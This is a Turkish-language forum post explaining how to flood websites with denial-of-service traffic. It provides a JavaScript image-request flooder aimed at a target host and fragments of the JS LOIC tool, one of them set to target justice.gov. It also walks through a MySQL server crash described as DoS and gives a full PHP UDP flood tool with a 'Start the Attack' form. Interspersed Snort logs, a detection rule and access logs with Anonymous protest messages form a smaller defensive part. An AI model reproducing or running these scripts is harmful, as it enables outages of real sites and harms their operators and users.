Mesela JS(JavaScript) + HTML + NET destekli bazi scriptlerde vardi. Bu
Script-leri kullanmaya basladigin zaman sanki siteye girib ctrl+r
basarmissin gibi Attack yapiyor. Yani cok yukleniyor > Traffik Atiyor
> Site yavasliyor = Down
ISte oylece "WTF?!" Diyerek kaliriz. Nasil Yapilir bu attack-lar?
Mesela Asagidaki 1 JS + HTML destekli (ctrl+r) Scriptidir. 1 nevin onu
.html gibi upload ederiz post-da inputlari yarar
Ve parse bile olunmadan Dalar serverin icine boylece zayifladir
Serveri. Bu 1 nevin SYN DDoS-dur. ve bunu 1 cok kisiyle yaptiginda iyi
olur. Amma sadece 1 bilgisayar DDoS + UDP ise yaramaz.
Kod:
<script type="text/javascript">
attack_host="www.site.ru" //down olunacak site adresi
attack_port=80
path='Shared/Compatibility.aspx'
for(i=1;i<=3000;i++)
{ document.write('<img src="http://' + attack_host + ':' + attack_port + '/' + path + '?' + Math.random() + '">');}
</script>
Kod:
var fireInterval;
var isFiring = false;
var currentTime = new Date()
var lastSuccess = currentTime.getTime();
var requestedCtrNode = document.getElementById("requestedCtr"),
succeededCtrNode = document.getElementById("succeededCtr"),
failedCtrNode = document.getElementById("failedCtr"),
targetURLNode = document.getElementById("targetURL")
Kod:
var requestsHT = {};
Kod:
GET /?id=1327271393334&msg=No%20A%20la%20CENSURA%20EN%20INTERNET%A1%A1%A1 HTTP/1.1" 200 8395
Kod:
GET /app/?id=1292337572944&msg=BOOM%2520HEADSHOT! HTTP/1.1 Host: www.example.com User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive
Kod:
mysql-test/suite/innodb/t/innodb_bug13510739.test # # Bug#13510739 63775: SERVER CRASH ON HANDLER READ NEXT AFTER DELETE RECORD. # -- source include/have_innodb.inc CREATE TABLE bug13510739 (c INTEGER NOT NULL, PRIMARY KEY (c)) ENGINE=INNODB; INSERT INTO bug13510739 VALUES (1), (2), (3), (4); DELETE FROM bug13510739 WHERE c=2; HANDLER bug13510739 OPEN; HANDLER bug13510739 READ `primary` = (2); # this one crashes the server IF the bug IS present HANDLER bug13510739 READ `primary` NEXT; DROP TABLE bug13510739;
Kod:
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> show tables \g ERROR 1046 (3D000): No database selected mysql> show databases \g +--------------------+ | Database | +--------------------+ | information_schema | | sed165 | +--------------------+ 2 rows in set (0.00 sec) mysql> \s -------------- mysql Ver 14.14 Distrib 5.5.21, for Win32 (x86) Connection id: 5 Current database: Current user: sed165@localhost SSL: Not in use Using delimiter: ; Server version: 5.5.21 MySQL Community Server (GPL) Protocol version: 10 Connection: localhost via TCP/IP Server characterset: latin1 Db characterset: latin1 Client characterset: latin1 Conn. characterset: latin1 TCP port: 3306 Uptime: 5 min 33 sec Threads: 1 Questions: 18 Slow queries: 0 Opens: 35 Flush tables: 1 Open tables: 28 Queries per second avg: 0.054 -------------- mysql> show grants for 'sed165'@'%' \g +-------------------------------------------------------------------------------------------------------+ | Grants for sed165@% | +-------------------------------------------------------------------------------------------------------+ | GRANT USAGE ON *.* TO 'sed165'@'%' IDENTIFIED BY PASSWORD '*803F09BD31CC02F76D5D5C5451D00C8CDA4E9A15' | | GRANT ALL PRIVILEGES ON `sed165`.* TO 'sed165'@'%' WITH GRANT OPTION | +-------------------------------------------------------------------------------------------------------+ 2 rows in set (0.00 sec) mysql> use sed165 \g Query OK, 0 rows affected (0.00 sec) mysql> CREATE TABLE bug13510739 (c INTEGER NOT NULL, PRIMARY KEY (c)) ENGINE=INNODB; Query OK, 0 rows affected (0.11 sec) mysql> mysql> INSERT INTO bug13510739 VALUES (1), (2), (3), (4); Query OK, 4 rows affected (0.01 sec) Records: 4 Duplicates: 0 Warnings: 0 mysql> mysql> DELETE FROM bug13510739 WHERE c=2; Query OK, 1 row affected (0.05 sec) mysql> mysql> HANDLER bug13510739 OPEN; Query OK, 0 rows affected (0.00 sec) mysql> mysql> HANDLER bug13510739 READ `primary` = (2); Empty set (0.00 sec) mysql> mysql> # this one crashes the server IF the bug IS present mysql> HANDLER bug13510739 READ `primary` NEXT; Mysql Server Crash Olur burada.(Denial Of Service)
Kod:
# snort -c snort-test.conf -A console -q -r /LABS2/LOIC/PCAP/LOIC-udp.pcap -O
Kod:
01/27-11:58:38.849802 [**] [1:1234590:1] SLR - LOIC DoS Tool (UDP Mode) - Behavior Rule (tracking/threshold) [**] [Classification: Misc activity] [Priority: 3] {UDP} xxx.xxx.xxx.xxx:59022 -> xxx.xxx.xxx.xxx:80
01/27-11:58:38.952511 [**] [1:1234590:1] SLR - LOIC DoS Tool (UDP Mode) - Behavior Rule (tracking/threshold) [**] [Classification: Misc activity] [Priority: 3] {UDP} xxx.xxx.xxx.xxx:59022 -> xxx.xxx.xxx.xxx:80
01/27-11:58:39.024253 [**] [1:1234590:1] SLR - LOIC DoS Tool (UDP Mode) - Behavior Rule (tracking/threshold) [**] [Classification: Misc activity] [Priority: 3] {UDP} xxx.xxx.xxx.xxx:59022 -> xxx.xxx.xxx.xxx:80
 | Orjinal Boyutunda Açmak İçin ( 1153x649 ve %3$sKB ) Buraya Tıklayın |
Yani DDoS-a karsi korunun. GET request yapiyor :
Kod:
GET /HTTP/1.0\r\n
VE TCP uzerinden analyizlere devam :
Kod:
01/27-11:57:52.977537 [**] [1:1234569:1] SLR - LOIC DoS Tool (HTTP Mode) [**] [Classification: Misc activity] [Priority: 3] {TCP} xxx.xxx.xxx.xxx:55178 -> xxx.xxx.xxx.xxx:80
01/27-11:57:54.184679 [**] [1:1234569:1] SLR - LOIC DoS Tool (HTTP Mode) [**] [Classification: Misc activity] [Priority: 3] {TCP} xxx.xxx.xxx.xxx:55188 -> xxx.xxx.xxx.xxx:80
01/27-11:57:55.111591 [**] [1:1234569:1] SLR - LOIC DoS Tool (HTTP Mode) [**] [Classification: Misc activity] [Priority: 3] {TCP} xxx.xxx.xxx.xxx:55198 -> xxx.xxx.xxx.xxx:80
Kod:
var requestsHT = {}; // requests hash table, may come in handy later
var makeHttpRequest = function () {
…
var rID =Number(new Date());
var img = new Image();
…
img.setAttribute("src", targetURL + "?id=" + rID + "&msg=" + messageNode.value);
…
requestsHT[rID] = img;
…
}
Kod:
fireButton.onclick = function () {
if (isFiring) {
…
}
function FireIbero() {
…
}
…
document.getElementById("targetURL").value = "http://www.justice.gov";
FireIbero();
…
Kod:
var rID =Number(new Date()); var img = new Image();
Kod:
requestsHT[rID] = img;
:
Kod:
aaa.bbb.ccc.ddd - - [26/Jan/2012:11:24:05 +0200] "GET /?id=1327572484770&msg=Somos%20legi%C3%B3n! HTTP/1.1" 200 69 "hxxp://www.example.com/d/2.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
aaa.bbb.ccc.ddd - - [26/Jan/2012:11:24:05 +0200] "GET /?id=1327572484818&msg=Somos%20legi%C3%B3n! HTTP/1.1" 200 69 "hxxp://www.example.com/d/2.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
aaa.bbb.ccc.ddd - - [26/Jan/2012:11:24:05 +0200] "GET /?id=1327572484720&msg=Somos%20legi%C3%B3n! HTTP/1.1" 200 69 "hxxp://www.example.com/d/2.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
aaa.bbb.ccc.ddd - - [26/Jan/2012:11:24:05 +0200] "GET /?id=1327572484936&msg=Somos%20legi%C3%B3n! HTTP/1.1" 200 69 "hxxp://www.example.com/d/2.html" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
Kod:
alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"Attempted DoS using JS LOIC DoS Tool"; flow: established,to_server ; pcre:”/&id=\d{13}&msg=/Uis”; threshold: type threshold, track by_src, count 400 , seconds 5 ; classtype:misc-attack; sid:1000005; rev:1;)
Kod:
msg=%C2%A1%C2%A1NO%20NOS%20GUSTA%20LA%20
msg=:)
msg=:D
msg=Somos%20Legion!!!
msg=Somos%20legi%C3%B3n!
msg=Stop%20S.O.P.A%20:)%20%E2%99%AB%E2%99%AB HTTP/1.1" 200
msg=We%20Are%20Legion!
msg=gh
msg=open%20megaupload
msg=que%20sepan%20los%20nacidos%20y%20los%20que%20van%20a%20nacer %20que%20nacimos%20para%20vencer%20y%20no%20para%20ser%20vencidos
msg=stop%20SOPA!!
msg=We%20are%20Anonymous.%20We%20are%20Legion.%20We%20do%20not %20forgive.%20We%20do%20not%20forget.%20Expect%20us!
Ve Buda 1 PHP DoS Scripti :
Kod:
<?php
$ip = $_SERVER['REMOTE_ADDR'];
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
<meta name="author" content="">
<title>PHP DoS, Coded by ***</title>
</head>
<!-- PHP DOS, coded by *** -->
<style type="text/css">
<!--
body {
font-family: Arial, Helvetica, sans-serif;
font-size: 12px;
font-style: normal;
line-height: normal;
color: #FFFFFF;
background-color: #000000;
}
-->
</style>
<!-- PHP DOS, coded by *** -->
<body>
<center><br><br>
<img src="main.jpg"><br>
<b>Your IP:</b> <font color="red"><?php echo $ip; ?></font> (Don't DoS yourself nub)<br><br>
<form name="input" action="function.php" method="post">
IP:
<input type="text" name="ip" size="15" maxlength="15" class="main" value = "0.0.0.0" onblur = "if ( this.value=='' ) this.value = '0.0.0.0';" onfocus = " if ( this.value == '0.0.0.0' ) this.value = '';">
Time:
<input type="text" name="time" size="14" maxlength="20" class="main" value = "time (in seconds)" onblur = "if ( this.value=='' ) this.value = 'time (in seconds)';" onfocus = " if ( this.value == 'time (in seconds)' ) this.value = '';">
Port:
<input type="text" name="port" size="5" maxlength="5" class="main" value = "port" onblur = "if ( this.value=='' ) this.value = 'port';" onfocus = " if ( this.value == 'port' ) this.value = '';">
<br><br>
<input type="submit" value=" Start the Attack---> ">
<br><br>
<center>
After initiating the DoS attack, please wait while the browser loads.
</center>
</form>
</center>
<!-- PHP DOS, coded by *** -->
</body>
</html>
Kod:
<?php
//=================================================
//PHP DOS v1.8 (Possibly Stronger Flood Strength)
//Coded by ***
//www.********.tld
//=================================================
$packets = 0;
$ip = $_POST['ip'];
$rand = $_POST['port'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_POST['time'];
$time = time();
print "Flooded: $ip on port $rand <br><br>";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= "X";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo "Packet complete at ".time('h:i:s')." with $packets (" . round(($packets*65)/1024, 2) . " mB) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
?>
Basarilar + Tesekkurler 
& Respect!! ^_^Topic : http://www.millikuvvetler.net/showthread.php?t=8006
Peace!!!
Hiç yorum yok:
Yorum Gönder